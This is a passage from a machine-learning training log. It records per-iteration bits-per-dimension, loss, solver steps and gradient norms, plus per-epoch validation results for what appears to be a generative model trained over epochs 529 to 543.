Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 446(448.49) | Grad Norm 0.0757(0.0911) | Total Time 10.00(10.00)\nIter 5674 | Time 40.8987(40.6278) | Bit/dim 1.0751(1.0745) | Xent 0.0000(0.0000) | Loss 1.0751(1.0745) | Error 0.0000(0.0000) Steps 452(448.59) | Grad Norm 0.1066(0.0916) | Total Time 10.00(10.00)\nIter 5675 | Time 40.8310(40.6339) | Bit/dim 1.0744(1.0745) | Xent 0.0000(0.0000) | Loss 1.0744(1.0745) | Error 0.0000(0.0000) Steps 452(448.69) | Grad Norm 0.1043(0.0920) | Total Time 10.00(10.00)\nIter 5676 | Time 40.2517(40.6224) | Bit/dim 1.0782(1.0746) | Xent 0.0000(0.0000) | Loss 1.0782(1.0746) | Error 0.0000(0.0000) Steps 452(448.79) | Grad Norm 0.0563(0.0909) | Total Time 10.00(10.00)\nIter 5677 | Time 41.0270(40.6346) | Bit/dim 1.0735(1.0746) | Xent 0.0000(0.0000) | Loss 1.0735(1.0746) | Error 0.0000(0.0000) Steps 446(448.71) | Grad Norm 0.0734(0.0904) | Total Time 10.00(10.00)\nIter 5678 | Time 39.2006(40.5915) | Bit/dim 1.0745(1.0746) | Xent 0.0000(0.0000) | Loss 1.0745(1.0746) | Error 0.0000(0.0000) Steps 446(448.63) | Grad Norm 0.1012(0.0907) | Total Time 10.00(10.00)\nIter 5679 | Time 39.2079(40.5500) | Bit/dim 1.0753(1.0746) | Xent 0.0000(0.0000) | Loss 1.0753(1.0746) | Error 0.0000(0.0000) Steps 446(448.55) | Grad Norm 0.0858(0.0906) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0529 | Time 15.1441, Epoch Time 309.0903(311.3345), Bit/dim 1.0696(best: 1.0688), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5680 | Time 41.6058(40.5817) | Bit/dim 1.0721(1.0745) | Xent 0.0000(0.0000) | Loss 1.0721(1.0745) | Error 0.0000(0.0000) Steps 446(448.47) | Grad Norm 0.0724(0.0900) | Total Time 10.00(10.00)\nIter 5681 | Time 40.1879(40.5699) | Bit/dim 1.0769(1.0746) | Xent 0.0000(0.0000) | Loss 1.0769(1.0746) | Error 0.0000(0.0000) Steps 446(448.40) | Grad Norm 0.1037(0.0904) | Total Time 10.00(10.00)\nIter 5682 | Time 40.0276(40.5536) | Bit/dim 1.0743(1.0746) | Xent 0.0000(0.0000) | Loss 1.0743(1.0746) | Error 0.0000(0.0000) Steps 446(448.33) | Grad Norm 0.1033(0.0908) | Total Time 10.00(10.00)\nIter 5683 | Time 40.5036(40.5521) | Bit/dim 1.0737(1.0746) | Xent 0.0000(0.0000) | Loss 1.0737(1.0746) | Error 0.0000(0.0000) Steps 452(448.44) | Grad Norm 0.0908(0.0908) | Total Time 10.00(10.00)\nIter 5684 | Time 40.6916(40.5563) | Bit/dim 1.0748(1.0746) | Xent 0.0000(0.0000) | Loss 1.0748(1.0746) | Error 0.0000(0.0000) Steps 452(448.54) | Grad Norm 0.0690(0.0902) | Total Time 10.00(10.00)\nIter 5685 | Time 42.0432(40.6009) | Bit/dim 1.0734(1.0745) | Xent 0.0000(0.0000) | Loss 1.0734(1.0745) | Error 0.0000(0.0000) Steps 446(448.47) | Grad Norm 0.1204(0.0911) | Total Time 10.00(10.00)\nIter 5686 | Time 40.8638(40.6088) | Bit/dim 1.0731(1.0745) | Xent 0.0000(0.0000) | Loss 1.0731(1.0745) | Error 0.0000(0.0000) Steps 452(448.57) | Grad Norm 0.1704(0.0934) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0530 | Time 15.4002, Epoch Time 313.9058(311.4117), Bit/dim 1.0692(best: 1.0688), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5687 | Time 40.5936(40.6083) | Bit/dim 1.0732(1.0745) | Xent 0.0000(0.0000) | Loss 1.0732(1.0745) | Error 0.0000(0.0000) Steps 452(448.68) | Grad Norm 0.0685(0.0927) | Total Time 10.00(10.00)\nIter 5688 | Time 39.9600(40.5889) | Bit/dim 1.0735(1.0744) | Xent 0.0000(0.0000) | Loss 1.0735(1.0744) | Error 0.0000(0.0000) Steps 452(448.78) | Grad Norm 0.0791(0.0923) | Total Time 10.00(10.00)\nIter 5689 | Time 39.5345(40.5573) | Bit/dim 1.0787(1.0746) | Xent 0.0000(0.0000) | Loss 1.0787(1.0746) | Error 0.0000(0.0000) Steps 446(448.69) | Grad Norm 0.1921(0.0953) | Total Time 10.00(10.00)\nIter 5690 | Time 39.8809(40.5370) | Bit/dim 1.0790(1.0747) | Xent 0.0000(0.0000) | Loss 1.0790(1.0747) | Error 0.0000(0.0000) Steps 446(448.61) | Grad Norm 0.0848(0.0950) | Total Time 10.00(10.00)\nIter 5691 | Time 40.5922(40.5386) | Bit/dim 1.0704(1.0746) | Xent 0.0000(0.0000) | Loss 1.0704(1.0746) | Error 0.0000(0.0000) Steps 458(448.89) | Grad Norm 0.0742(0.0943) | Total Time 10.00(10.00)\nIter 5692 | Time 42.1587(40.5872) | Bit/dim 1.0729(1.0745) | Xent 0.0000(0.0000) | Loss 1.0729(1.0745) | Error 0.0000(0.0000) Steps 452(448.99) | Grad Norm 0.2144(0.0979) | Total Time 10.00(10.00)\nIter 5693 | Time 39.6368(40.5587) | Bit/dim 1.0732(1.0745) | Xent 0.0000(0.0000) | Loss 1.0732(1.0745) | Error 0.0000(0.0000) Steps 452(449.08) | Grad Norm 0.1248(0.0987) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0531 | Time 15.1841, Epoch Time 309.8531(311.3649), Bit/dim 1.0692(best: 1.0688), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5694 | Time 40.6406(40.5612) | Bit/dim 1.0761(1.0745) | Xent 0.0000(0.0000) | Loss 1.0761(1.0745) | Error 0.0000(0.0000) Steps 452(449.17) | Grad Norm 0.0695(0.0979) | Total Time 10.00(10.00)\nIter 5695 | Time 39.5994(40.5323) | Bit/dim 1.0753(1.0745) | Xent 0.0000(0.0000) | Loss 1.0753(1.0745) | Error 0.0000(0.0000) Steps 452(449.25) | Grad Norm 0.1097(0.0982) | Total Time 10.00(10.00)\nIter 5696 | Time 39.3350(40.4964) | Bit/dim 1.0755(1.0746) | Xent 0.0000(0.0000) | Loss 1.0755(1.0746) | Error 0.0000(0.0000) Steps 446(449.15) | Grad Norm 0.1548(0.0999) | Total Time 10.00(10.00)\nIter 5697 | Time 40.0687(40.4836) | Bit/dim 1.0743(1.0746) | Xent 0.0000(0.0000) | Loss 1.0743(1.0746) | Error 0.0000(0.0000) Steps 452(449.24) | Grad Norm 0.0884(0.0996) | Total Time 10.00(10.00)\nIter 5698 | Time 39.4401(40.4523) | Bit/dim 1.0744(1.0746) | Xent 0.0000(0.0000) | Loss 1.0744(1.0746) | Error 0.0000(0.0000) Steps 452(449.32) | Grad Norm 0.0874(0.0992) | Total Time 10.00(10.00)\nIter 5699 | Time 40.9272(40.4665) | Bit/dim 1.0709(1.0744) | Xent 0.0000(0.0000) | Loss 1.0709(1.0744) | Error 0.0000(0.0000) Steps 452(449.40) | Grad Norm 0.1773(0.1016) | Total Time 10.00(10.00)\nIter 5700 | Time 41.4609(40.4963) | Bit/dim 1.0739(1.0744) | Xent 0.0000(0.0000) | Loss 1.0739(1.0744) | Error 0.0000(0.0000) Steps 452(449.48) | Grad Norm 0.0816(0.1010) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0532 | Time 15.0380, Epoch Time 308.9234(311.2917), Bit/dim 1.0691(best: 1.0688), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5701 | Time 39.5747(40.4687) | Bit/dim 1.0756(1.0745) | Xent 0.0000(0.0000) | Loss 1.0756(1.0745) | Error 0.0000(0.0000) Steps 446(449.37) | Grad Norm 0.0796(0.1003) | Total Time 10.00(10.00)\nIter 5702 | Time 41.4109(40.4970) | Bit/dim 1.0706(1.0744) | Xent 0.0000(0.0000) | Loss 1.0706(1.0744) | Error 0.0000(0.0000) Steps 446(449.27) | Grad Norm 0.0659(0.0993) | Total Time 10.00(10.00)\nIter 5703 | Time 39.7847(40.4756) | Bit/dim 1.0742(1.0743) | Xent 0.0000(0.0000) | Loss 1.0742(1.0743) | Error 0.0000(0.0000) Steps 446(449.18) | Grad Norm 0.1701(0.1014) | Total Time 10.00(10.00)\nIter 5704 | Time 41.8734(40.5175) | Bit/dim 1.0740(1.0743) | Xent 0.0000(0.0000) | Loss 1.0740(1.0743) | Error 0.0000(0.0000) Steps 452(449.26) | Grad Norm 0.1180(0.1019) | Total Time 10.00(10.00)\nIter 5705 | Time 39.8258(40.4968) | Bit/dim 1.0736(1.0743) | Xent 0.0000(0.0000) | Loss 1.0736(1.0743) | Error 0.0000(0.0000) Steps 452(449.34) | Grad Norm 0.0688(0.1009) | Total Time 10.00(10.00)\nIter 5706 | Time 41.8474(40.5373) | Bit/dim 1.0800(1.0745) | Xent 0.0000(0.0000) | Loss 1.0800(1.0745) | Error 0.0000(0.0000) Steps 446(449.24) | Grad Norm 0.1246(0.1016) | Total Time 10.00(10.00)\nIter 5707 | Time 40.0877(40.5238) | Bit/dim 1.0752(1.0745) | Xent 0.0000(0.0000) | Loss 1.0752(1.0745) | Error 0.0000(0.0000) Steps 452(449.32) | Grad Norm 0.0875(0.1012) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0533 | Time 15.2931, Epoch Time 312.1853(311.3185), Bit/dim 1.0692(best: 1.0688), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5708 | Time 40.6041(40.5262) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 446(449.23) | Grad Norm 0.1276(0.1020) | Total Time 10.00(10.00)\nIter 5709 | Time 41.1463(40.5448) | Bit/dim 1.0778(1.0746) | Xent 0.0000(0.0000) | Loss 1.0778(1.0746) | Error 0.0000(0.0000) Steps 452(449.31) | Grad Norm 0.0750(0.1012) | Total Time 10.00(10.00)\nIter 5710 | Time 40.1075(40.5317) | Bit/dim 1.0718(1.0745) | Xent 0.0000(0.0000) | Loss 1.0718(1.0745) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.1221(0.1018) | Total Time 10.00(10.00)\nIter 5711 | Time 39.3428(40.4960) | Bit/dim 1.0772(1.0746) | Xent 0.0000(0.0000) | Loss 1.0772(1.0746) | Error 0.0000(0.0000) Steps 452(449.47) | Grad Norm 0.0905(0.1015) | Total Time 10.00(10.00)\nIter 5712 | Time 40.8798(40.5075) | Bit/dim 1.0707(1.0745) | Xent 0.0000(0.0000) | Loss 1.0707(1.0745) | Error 0.0000(0.0000) Steps 452(449.54) | Grad Norm 0.0545(0.1001) | Total Time 10.00(10.00)\nIter 5713 | Time 40.6463(40.5117) | Bit/dim 1.0737(1.0744) | Xent 0.0000(0.0000) | Loss 1.0737(1.0744) | Error 0.0000(0.0000) Steps 452(449.62) | Grad Norm 0.0753(0.0993) | Total Time 10.00(10.00)\nIter 5714 | Time 41.0906(40.5291) | Bit/dim 1.0767(1.0745) | Xent 0.0000(0.0000) | Loss 1.0767(1.0745) | Error 0.0000(0.0000) Steps 446(449.51) | Grad Norm 0.0851(0.0989) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0534 | Time 15.0380, Epoch Time 311.5847(311.3265), Bit/dim 1.0694(best: 1.0688), Xent 0.0000, Loss 1.0694, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5715 | Time 41.8778(40.5695) | Bit/dim 1.0762(1.0746) | Xent 0.0000(0.0000) | Loss 1.0762(1.0746) | Error 0.0000(0.0000) Steps 446(449.40) | Grad Norm 0.0708(0.0981) | Total Time 10.00(10.00)\nIter 5716 | Time 39.7789(40.5458) | Bit/dim 1.0738(1.0745) | Xent 0.0000(0.0000) | Loss 1.0738(1.0745) | Error 0.0000(0.0000) Steps 452(449.48) | Grad Norm 0.1282(0.0990) | Total Time 10.00(10.00)\nIter 5717 | Time 39.5321(40.5154) | Bit/dim 1.0708(1.0744) | Xent 0.0000(0.0000) | Loss 1.0708(1.0744) | Error 0.0000(0.0000) Steps 452(449.56) | Grad Norm 0.0702(0.0981) | Total Time 10.00(10.00)\nIter 5718 | Time 42.7123(40.5813) | Bit/dim 1.0744(1.0744) | Xent 0.0000(0.0000) | Loss 1.0744(1.0744) | Error 0.0000(0.0000) Steps 452(449.63) | Grad Norm 0.0596(0.0969) | Total Time 10.00(10.00)\nIter 5719 | Time 41.5723(40.6110) | Bit/dim 1.0781(1.0745) | Xent 0.0000(0.0000) | Loss 1.0781(1.0745) | Error 0.0000(0.0000) Steps 446(449.52) | Grad Norm 0.0618(0.0959) | Total Time 10.00(10.00)\nIter 5720 | Time 41.4395(40.6359) | Bit/dim 1.0729(1.0745) | Xent 0.0000(0.0000) | Loss 1.0729(1.0745) | Error 0.0000(0.0000) Steps 446(449.42) | Grad Norm 0.0632(0.0949) | Total Time 10.00(10.00)\nIter 5721 | Time 40.2160(40.6233) | Bit/dim 1.0755(1.0745) | Xent 0.0000(0.0000) | Loss 1.0755(1.0745) | Error 0.0000(0.0000) Steps 446(449.31) | Grad Norm 0.0628(0.0939) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0535 | Time 14.9954, Epoch Time 314.8559(311.4324), Bit/dim 1.0694(best: 1.0688), Xent 0.0000, Loss 1.0694, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5722 | Time 39.8141(40.5990) | Bit/dim 1.0742(1.0745) | Xent 0.0000(0.0000) | Loss 1.0742(1.0745) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.0676(0.0932) | Total Time 10.00(10.00)\nIter 5723 | Time 39.2260(40.5578) | Bit/dim 1.0748(1.0745) | Xent 0.0000(0.0000) | Loss 1.0748(1.0745) | Error 0.0000(0.0000) Steps 446(449.29) | Grad Norm 0.0516(0.0919) | Total Time 10.00(10.00)\nIter 5724 | Time 42.1622(40.6060) | Bit/dim 1.0748(1.0745) | Xent 0.0000(0.0000) | Loss 1.0748(1.0745) | Error 0.0000(0.0000) Steps 446(449.19) | Grad Norm 0.0617(0.0910) | Total Time 10.00(10.00)\nIter 5725 | Time 42.0659(40.6498) | Bit/dim 1.0771(1.0746) | Xent 0.0000(0.0000) | Loss 1.0771(1.0746) | Error 0.0000(0.0000) Steps 452(449.28) | Grad Norm 0.1076(0.0915) | Total Time 10.00(10.00)\nIter 5726 | Time 41.8358(40.6853) | Bit/dim 1.0706(1.0745) | Xent 0.0000(0.0000) | Loss 1.0706(1.0745) | Error 0.0000(0.0000) Steps 452(449.36) | Grad Norm 0.0644(0.0907) | Total Time 10.00(10.00)\nIter 5727 | Time 39.4454(40.6481) | Bit/dim 1.0769(1.0745) | Xent 0.0000(0.0000) | Loss 1.0769(1.0745) | Error 0.0000(0.0000) Steps 446(449.26) | Grad Norm 0.0792(0.0903) | Total Time 10.00(10.00)\nIter 5728 | Time 39.5804(40.6161) | Bit/dim 1.0712(1.0744) | Xent 0.0000(0.0000) | Loss 1.0712(1.0744) | Error 0.0000(0.0000) Steps 446(449.16) | Grad Norm 0.0614(0.0895) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0536 | Time 15.0466, Epoch Time 311.8912(311.4461), Bit/dim 1.0693(best: 1.0688), Xent 0.0000, Loss 1.0693, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5729 | Time 40.5201(40.6132) | Bit/dim 1.0808(1.0746) | Xent 0.0000(0.0000) | Loss 1.0808(1.0746) | Error 0.0000(0.0000) Steps 452(449.25) | Grad Norm 0.0615(0.0886) | Total Time 10.00(10.00)\nIter 5730 | Time 42.4252(40.6676) | Bit/dim 1.0722(1.0746) | Xent 0.0000(0.0000) | Loss 1.0722(1.0746) | Error 0.0000(0.0000) Steps 452(449.33) | Grad Norm 0.0781(0.0883) | Total Time 10.00(10.00)\nIter 5731 | Time 39.2028(40.6236) | Bit/dim 1.0748(1.0746) | Xent 0.0000(0.0000) | Loss 1.0748(1.0746) | Error 0.0000(0.0000) Steps 446(449.23) | Grad Norm 0.0831(0.0882) | Total Time 10.00(10.00)\nIter 5732 | Time 41.0826(40.6374) | Bit/dim 1.0726(1.0745) | Xent 0.0000(0.0000) | Loss 1.0726(1.0745) | Error 0.0000(0.0000) Steps 452(449.31) | Grad Norm 0.0678(0.0875) | Total Time 10.00(10.00)\nIter 5733 | Time 40.7519(40.6408) | Bit/dim 1.0720(1.0744) | Xent 0.0000(0.0000) | Loss 1.0720(1.0744) | Error 0.0000(0.0000) Steps 446(449.21) | Grad Norm 0.0530(0.0865) | Total Time 10.00(10.00)\nIter 5734 | Time 42.0717(40.6838) | Bit/dim 1.0737(1.0744) | Xent 0.0000(0.0000) | Loss 1.0737(1.0744) | Error 0.0000(0.0000) Steps 446(449.12) | Grad Norm 0.0743(0.0861) | Total Time 10.00(10.00)\nIter 5735 | Time 40.9497(40.6917) | Bit/dim 1.0715(1.0743) | Xent 0.0000(0.0000) | Loss 1.0715(1.0743) | Error 0.0000(0.0000) Steps 452(449.20) | Grad Norm 0.1249(0.0873) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0537 | Time 15.2027, Epoch Time 314.7604(311.5456), Bit/dim 1.0689(best: 1.0688), Xent 0.0000, Loss 1.0689, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5736 | Time 41.8051(40.7251) | Bit/dim 1.0725(1.0743) | Xent 0.0000(0.0000) | Loss 1.0725(1.0743) | Error 0.0000(0.0000) Steps 446(449.11) | Grad Norm 0.0591(0.0865) | Total Time 10.00(10.00)\nIter 5737 | Time 41.3509(40.7439) | Bit/dim 1.0762(1.0743) | Xent 0.0000(0.0000) | Loss 1.0762(1.0743) | Error 0.0000(0.0000) Steps 452(449.19) | Grad Norm 0.1074(0.0871) | Total Time 10.00(10.00)\nIter 5738 | Time 39.7199(40.7132) | Bit/dim 1.0778(1.0744) | Xent 0.0000(0.0000) | Loss 1.0778(1.0744) | Error 0.0000(0.0000) Steps 452(449.28) | Grad Norm 0.0720(0.0866) | Total Time 10.00(10.00)\nIter 5739 | Time 40.2338(40.6988) | Bit/dim 1.0749(1.0744) | Xent 0.0000(0.0000) | Loss 1.0749(1.0744) | Error 0.0000(0.0000) Steps 446(449.18) | Grad Norm 0.0656(0.0860) | Total Time 10.00(10.00)\nIter 5740 | Time 40.4397(40.6910) | Bit/dim 1.0737(1.0744) | Xent 0.0000(0.0000) | Loss 1.0737(1.0744) | Error 0.0000(0.0000) Steps 446(449.08) | Grad Norm 0.1087(0.0867) | Total Time 10.00(10.00)\nIter 5741 | Time 40.7199(40.6919) | Bit/dim 1.0750(1.0744) | Xent 0.0000(0.0000) | Loss 1.0750(1.0744) | Error 0.0000(0.0000) Steps 452(449.17) | Grad Norm 0.0714(0.0862) | Total Time 10.00(10.00)\nIter 5742 | Time 41.5719(40.7183) | Bit/dim 1.0735(1.0744) | Xent 0.0000(0.0000) | Loss 1.0735(1.0744) | Error 0.0000(0.0000) Steps 452(449.26) | Grad Norm 0.0719(0.0858) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0538 | Time 15.3092, Epoch Time 314.0019(311.6192), Bit/dim 1.0691(best: 1.0688), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5743 | Time 40.8925(40.7235) | Bit/dim 1.0725(1.0744) | Xent 0.0000(0.0000) | Loss 1.0725(1.0744) | Error 0.0000(0.0000) Steps 446(449.16) | Grad Norm 0.0601(0.0850) | Total Time 10.00(10.00)\nIter 5744 | Time 39.8990(40.6988) | Bit/dim 1.0752(1.0744) | Xent 0.0000(0.0000) | Loss 1.0752(1.0744) | Error 0.0000(0.0000) Steps 452(449.24) | Grad Norm 0.0941(0.0853) | Total Time 10.00(10.00)\nIter 5745 | Time 39.8912(40.6746) | Bit/dim 1.0759(1.0744) | Xent 0.0000(0.0000) | Loss 1.0759(1.0744) | Error 0.0000(0.0000) Steps 452(449.33) | Grad Norm 0.0886(0.0854) | Total Time 10.00(10.00)\nIter 5746 | Time 41.0268(40.6851) | Bit/dim 1.0744(1.0744) | Xent 0.0000(0.0000) | Loss 1.0744(1.0744) | Error 0.0000(0.0000) Steps 452(449.41) | Grad Norm 0.0847(0.0854) | Total Time 10.00(10.00)\nIter 5747 | Time 38.9058(40.6318) | Bit/dim 1.0741(1.0744) | Xent 0.0000(0.0000) | Loss 1.0741(1.0744) | Error 0.0000(0.0000) Steps 446(449.30) | Grad Norm 0.0667(0.0848) | Total Time 10.00(10.00)\nIter 5748 | Time 40.0567(40.6145) | Bit/dim 1.0734(1.0744) | Xent 0.0000(0.0000) | Loss 1.0734(1.0744) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.0794(0.0847) | Total Time 10.00(10.00)\nIter 5749 | Time 39.7336(40.5881) | Bit/dim 1.0741(1.0744) | Xent 0.0000(0.0000) | Loss 1.0741(1.0744) | Error 0.0000(0.0000) Steps 446(449.28) | Grad Norm 0.0651(0.0841) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0539 | Time 15.2290, Epoch Time 308.2560(311.5183), Bit/dim 1.0692(best: 1.0688), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5750 | Time 41.1225(40.6041) | Bit/dim 1.0781(1.0745) | Xent 0.0000(0.0000) | Loss 1.0781(1.0745) | Error 0.0000(0.0000) Steps 446(449.19) | Grad Norm 0.0650(0.0835) | Total Time 10.00(10.00)\nIter 5751 | Time 39.7430(40.5783) | Bit/dim 1.0723(1.0744) | Xent 0.0000(0.0000) | Loss 1.0723(1.0744) | Error 0.0000(0.0000) Steps 452(449.27) | Grad Norm 0.0651(0.0829) | Total Time 10.00(10.00)\nIter 5752 | Time 42.2105(40.6272) | Bit/dim 1.0773(1.0745) | Xent 0.0000(0.0000) | Loss 1.0773(1.0745) | Error 0.0000(0.0000) Steps 452(449.35) | Grad Norm 0.1157(0.0839) | Total Time 10.00(10.00)\nIter 5753 | Time 40.5713(40.6256) | Bit/dim 1.0717(1.0744) | Xent 0.0000(0.0000) | Loss 1.0717(1.0744) | Error 0.0000(0.0000) Steps 452(449.43) | Grad Norm 0.0609(0.0832) | Total Time 10.00(10.00)\nIter 5754 | Time 41.4022(40.6489) | Bit/dim 1.0733(1.0744) | Xent 0.0000(0.0000) | Loss 1.0733(1.0744) | Error 0.0000(0.0000) Steps 446(449.33) | Grad Norm 0.0963(0.0836) | Total Time 10.00(10.00)\nIter 5755 | Time 40.6583(40.6491) | Bit/dim 1.0729(1.0743) | Xent 0.0000(0.0000) | Loss 1.0729(1.0743) | Error 0.0000(0.0000) Steps 446(449.23) | Grad Norm 0.0769(0.0834) | Total Time 10.00(10.00)\nIter 5756 | Time 41.8019(40.6837) | Bit/dim 1.0716(1.0743) | Xent 0.0000(0.0000) | Loss 1.0716(1.0743) | Error 0.0000(0.0000) Steps 452(449.31) | Grad Norm 0.0606(0.0827) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0540 | Time 15.1755, Epoch Time 314.9930(311.6226), Bit/dim 1.0690(best: 1.0688), Xent 0.0000, Loss 1.0690, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5757 | Time 39.5057(40.6484) | Bit/dim 1.0768(1.0743) | Xent 0.0000(0.0000) | Loss 1.0768(1.0743) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.0605(0.0821) | Total Time 10.00(10.00)\nIter 5758 | Time 41.9033(40.6860) | Bit/dim 1.0735(1.0743) | Xent 0.0000(0.0000) | Loss 1.0735(1.0743) | Error 0.0000(0.0000) Steps 452(449.47) | Grad Norm 0.0772(0.0819) | Total Time 10.00(10.00)\nIter 5759 | Time 38.8543(40.6311) | Bit/dim 1.0755(1.0744) | Xent 0.0000(0.0000) | Loss 1.0755(1.0744) | Error 0.0000(0.0000) Steps 452(449.55) | Grad Norm 0.0615(0.0813) | Total Time 10.00(10.00)\nIter 5760 | Time 40.4946(40.6270) | Bit/dim 1.0749(1.0744) | Xent 0.0000(0.0000) | Loss 1.0749(1.0744) | Error 0.0000(0.0000) Steps 446(449.44) | Grad Norm 0.0813(0.0813) | Total Time 10.00(10.00)\nIter 5761 | Time 40.6381(40.6273) | Bit/dim 1.0715(1.0743) | Xent 0.0000(0.0000) | Loss 1.0715(1.0743) | Error 0.0000(0.0000) Steps 446(449.34) | Grad Norm 0.1192(0.0825) | Total Time 10.00(10.00)\nIter 5762 | Time 41.0444(40.6398) | Bit/dim 1.0736(1.0743) | Xent 0.0000(0.0000) | Loss 1.0736(1.0743) | Error 0.0000(0.0000) Steps 452(449.42) | Grad Norm 0.0833(0.0825) | Total Time 10.00(10.00)\nIter 5763 | Time 39.7363(40.6127) | Bit/dim 1.0752(1.0743) | Xent 0.0000(0.0000) | Loss 1.0752(1.0743) | Error 0.0000(0.0000) Steps 446(449.31) | Grad Norm 0.0821(0.0825) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0541 | Time 15.1237, Epoch Time 309.8301(311.5688), Bit/dim 1.0684(best: 1.0688), Xent 0.0000, Loss 1.0684, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5764 | Time 40.2170(40.6009) | Bit/dim 1.0703(1.0742) | Xent 0.0000(0.0000) | Loss 1.0703(1.0742) | Error 0.0000(0.0000) Steps 446(449.21) | Grad Norm 0.1216(0.0836) | Total Time 10.00(10.00)\nIter 5765 | Time 40.0066(40.5830) | Bit/dim 1.0739(1.0742) | Xent 0.0000(0.0000) | Loss 1.0739(1.0742) | Error 0.0000(0.0000) Steps 452(449.30) | Grad Norm 0.0486(0.0826) | Total Time 10.00(10.00)\nIter 5766 | Time 40.2742(40.5738) | Bit/dim 1.0781(1.0743) | Xent 0.0000(0.0000) | Loss 1.0781(1.0743) | Error 0.0000(0.0000) Steps 446(449.20) | Grad Norm 0.0650(0.0821) | Total Time 10.00(10.00)\nIter 5767 | Time 41.9508(40.6151) | Bit/dim 1.0680(1.0741) | Xent 0.0000(0.0000) | Loss 1.0680(1.0741) | Error 0.0000(0.0000) Steps 446(449.10) | Grad Norm 0.2296(0.0865) | Total Time 10.00(10.00)\nIter 5768 | Time 42.7777(40.6800) | Bit/dim 1.0755(1.0741) | Xent 0.0000(0.0000) | Loss 1.0755(1.0741) | Error 0.0000(0.0000) Steps 452(449.19) | Grad Norm 0.1155(0.0874) | Total Time 10.00(10.00)\nIter 5769 | Time 39.7799(40.6530) | Bit/dim 1.0740(1.0741) | Xent 0.0000(0.0000) | Loss 1.0740(1.0741) | Error 0.0000(0.0000) Steps 446(449.09) | Grad Norm 0.1146(0.0882) | Total Time 10.00(10.00)\nIter 5770 | Time 40.9789(40.6627) | Bit/dim 1.0777(1.0742) | Xent 0.0000(0.0000) | Loss 1.0777(1.0742) | Error 0.0000(0.0000) Steps 452(449.18) | Grad Norm 0.1693(0.0906) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0542 | Time 15.0047, Epoch Time 313.3738(311.6230), Bit/dim 1.0691(best: 1.0684), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5771 | Time 40.4650(40.6568) | Bit/dim 1.0785(1.0744) | Xent 0.0000(0.0000) | Loss 1.0785(1.0744) | Error 0.0000(0.0000) Steps 452(449.27) | Grad Norm 0.1269(0.0917) | Total Time 10.00(10.00)\nIter 5772 | Time 40.9434(40.6654) | Bit/dim 1.0735(1.0743) | Xent 0.0000(0.0000) | Loss 1.0735(1.0743) | Error 0.0000(0.0000) Steps 452(449.35) | Grad Norm 0.0569(0.0907) | Total Time 10.00(10.00)\nIter 5773 | Time 41.0665(40.6774) | Bit/dim 1.0674(1.0741) | Xent 0.0000(0.0000) | Loss 1.0674(1.0741) | Error 0.0000(0.0000) Steps 452(449.43) | Grad Norm 0.1132(0.0913) | Total Time 10.00(10.00)\nIter 5774 | Time 40.5860(40.6747) | Bit/dim 1.0724(1.0741) | Xent 0.0000(0.0000) | Loss 1.0724(1.0741) | Error 0.0000(0.0000) Steps 458(449.68) | Grad Norm 0.1313(0.0925) | Total Time 10.00(10.00)\nIter 5775 | Time 41.7113(40.7058) | Bit/dim 1.0748(1.0741) | Xent 0.0000(0.0000) | Loss 1.0748(1.0741) | Error 0.0000(0.0000) Steps 452(449.75) | Grad Norm 0.0799(0.0921) | Total Time 10.00(10.00)\nIter 5776 | Time 40.3452(40.6950) | Bit/dim 1.0793(1.0743) | Xent 0.0000(0.0000) | Loss 1.0793(1.0743) | Error 0.0000(0.0000) Steps 452(449.82) | Grad Norm 0.0689(0.0915) | Total Time 10.00(10.00)\nIter 5777 | Time 41.1296(40.7080) | Bit/dim 1.0747(1.0743) | Xent 0.0000(0.0000) | Loss 1.0747(1.0743) | Error 0.0000(0.0000) Steps 446(449.71) | Grad Norm 0.1126(0.0921) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0543 | Time 15.1179, Epoch Time 313.6788(311.6846), Bit/dim 1.0696(best: 1.0684), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5778 | Time 41.1198(40.7204) | 